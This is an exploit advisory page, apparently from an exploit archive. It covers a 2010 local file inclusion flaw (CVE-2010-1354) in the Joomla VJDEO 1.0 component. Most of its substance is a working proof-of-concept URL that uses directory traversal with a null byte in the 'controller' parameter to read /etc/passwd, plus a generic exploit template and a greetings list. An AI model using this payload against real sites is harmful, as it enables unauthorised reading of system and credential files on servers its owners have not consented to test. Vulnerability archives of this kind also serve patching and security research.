Joomla! Component VJDEO 1.0 - Local File Inclusion



EKU-ID: 19326 CVE: OSVDB-63581;CVE-2010-1354 OSVDB-ID:
Author: Angela Zhang Published: 2010-04-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


(o)=====================================================================================(o)

                              Joomla Component VJDEO 1.0 LFI Vulnerability


                Vendor   : http://www.joomla.ternaria.com/
                Author    : Angela Zhang
                Contact  : mizz_4ng3l@yahoo.com
                Date        :  07 - April - 2010

(o)======================================================================================(o)



     [o] Exploit

       http://localhost/[path]/index.php?option=com_vjdeo&controller=[LFI]


    [o] PoC

       http://localhost/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00



(o)===========================================================================================(o)

Greetz   :   -:-  3SomeCrew  -:-

     Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf ,   home_edition2001   ,   mywisdom , s4va,
     Winda Slovski , stardustmemory, wishnusakti, Xco Nuxco , Cakill Schumbag, dkk



(o)===========================================================================================(o)